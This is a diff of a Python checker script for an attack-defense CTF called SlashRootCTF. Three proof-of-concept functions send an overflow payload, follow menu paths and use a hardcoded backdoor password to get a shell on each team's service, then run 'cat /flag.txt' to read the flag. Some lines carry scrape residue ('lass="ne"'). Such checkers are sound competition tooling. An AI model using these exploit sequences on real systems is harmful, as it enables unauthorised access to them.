|
|
@ -15,74 +15,53 @@ FORMAT = "SlashRootCTF" |
|
|
|
|
|
|
|
|
|
|
|
def poc0(host, port): |
|
|
|
with remote(host, port) as p: |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
|
msg = p.recvuntil(">").decode('utf-8') |
|
|
|
# print(msg) |
|
|
|
if "young" in msg: |
|
|
|
p.sendline("y") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("2") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("4") |
|
|
|
try: |
|
|
|
with remote(host, port) as p: |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("y") |
|
|
|
for _ in range(10): |
|
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
|
msg = p.recvuntil(">").decode('utf-8') |
|
|
|
# print(msg) |
|
|
|
if "young" in msg: |
|
|
|
p.sendline("y") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("99") |
|
|
|
p.sendline("cat /flag.txt") |
|
|
|
flag = p.recvuntil("}").decode('utf-8') |
|
|
|
# print flag |
|
|
|
if FORMAT in flag: |
|
|
|
return True |
|
|
|
p.sendline("2") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("4") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("y") |
|
|
|
for _ in range(10): |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("99") |
|
|
|
p.sendline("cat /flag.txt") |
|
|
|
flag = p.recvuntil("}").decode('utf-8') |
|
|
|
# print flag |
|
|
|
if FORMAT in flag: |
|
|
|
return flag[-46:] |
|
|
|
else: |
|
|
|
return False |
|
|
|
else: |
|
|
|
return False |
|
|
|
else: |
|
|
|
return False |
|
|
|
except lass="ne">EOFError: |
|
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
def poc1(host, port): |
|
|
|
with remote(host, port) as p: |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("Leo") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("y") |
|
|
|
for _ in range(2): |
|
|
|
try: |
|
|
|
with remote(host, port) as p: |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("3") |
|
|
|
p.sendline("Leo") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("0") |
|
|
|
if "Who" in p.recvuntil(">").decode('utf-8'): |
|
|
|
return False |
|
|
|
p.sendline("y") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("1") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("4") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("y") |
|
|
|
for _ in range(10): |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("99") |
|
|
|
p.sendline("cat /flag.txt") |
|
|
|
flag = p.recvuntil("}").decode('utf-8') |
|
|
|
if FORMAT in flag: |
|
|
|
return True |
|
|
|
else: |
|
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
def poc2(host, port): |
|
|
|
with remote(host, port) as p: |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("y") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("6") |
|
|
|
if "Lv: 1000000" in p.recvuntil(">").decode('utf-8'): |
|
|
|
p.sendline("2") |
|
|
|
for _ in range(2): |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("3") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("0") |
|
|
|
if "Who" in p.recvuntil(">").decode('utf-8'): |
|
|
|
return False |
|
|
|
p.sendline("y") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("1") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("4") |
|
|
|
p.recvuntil(">") |
|
|
@ -93,11 +72,41 @@ def poc2(host, port): |
|
|
|
p.sendline("cat /flag.txt") |
|
|
|
flag = p.recvuntil("}").decode('utf-8') |
|
|
|
if FORMAT in flag: |
|
|
|
return True |
|
|
|
return flag[-46:] |
|
|
|
else: |
|
|
|
return False |
|
|
|
except EOFError: |
|
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
def poc2(host, port): |
|
|
|
try: |
|
|
|
with remote(host, port) as p: |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("y") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("6") |
|
|
|
if "Lv: 1000000" in p.recvuntil(">").decode('utf-8'): |
|
|
|
p.sendline("2") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("4") |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("y") |
|
|
|
for _ in range(10): |
|
|
|
p.recvuntil(">") |
|
|
|
p.sendline("99") |
|
|
|
p.sendline("cat /flag.txt") |
|
|
|
flag = p.recvuntil("}").decode('utf-8') |
|
|
|
if FORMAT in flag: |
|
|
|
return flag[-46:] |
|
|
|
else: |
|
|
|
return False |
|
|
|
else: |
|
|
|
return False |
|
|
|
else: |
|
|
|
return False |
|
|
|
except lass="ne">EOFError: |
|
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
def poc(host, port): |
|
|
@ -120,6 +129,9 @@ def check(team): |
|
|
|
r0 = poc0(HOST, port) |
|
|
|
r1 = poc1(HOST, port) |
|
|
|
r2 = poc2(HOST, port) |
|
|
|
# r0 = False |
|
|
|
# r1 = False |
|
|
|
# r2 = False |
|
|
|
return "Team [{:02d}] {} {} {} {}".format(team, r, r0, r1, r2) |
|
|
|
|
|
|
|
|
|
|
@ -148,6 +160,15 @@ if __name__ == "__main__": |
|
|
|
while True: |
|
|
|
with Pool(TOTAL_TEAMS) as p: |
|
|
|
results = p.map(check, range(1, TOTAL_TEAMS+1)) |
|
|
|
r0 = r1 = r2 = r3 = 0 |
|
|
|
for result in results: |
|
|
|
checker_logger.info(result) |
|
|
|
status = result.split(' ')[2:] |
|
|
|
# print(status) |
|
|
|
r0 = (r0 + 1) if status[0] != "False" else (r0) |
|
|
|
r1 = (r1 + 1) if status[1] != "False" else (r1) |
|
|
|
r2 = (r2 + 1) if status[2] != "False" else (r2) |
|
|
|
r3 = (r3 + 1) if status[3] != "False" else (r3) |
|
|
|
checker_logger.info( |
|
|
|
"Summary: {} working as expected, 1st vuln {}, 2nd vuln {}, 3rd vuln {}".format(r0, r1, r2, r3)) |
|
|
|
sleep(INTERVAL) |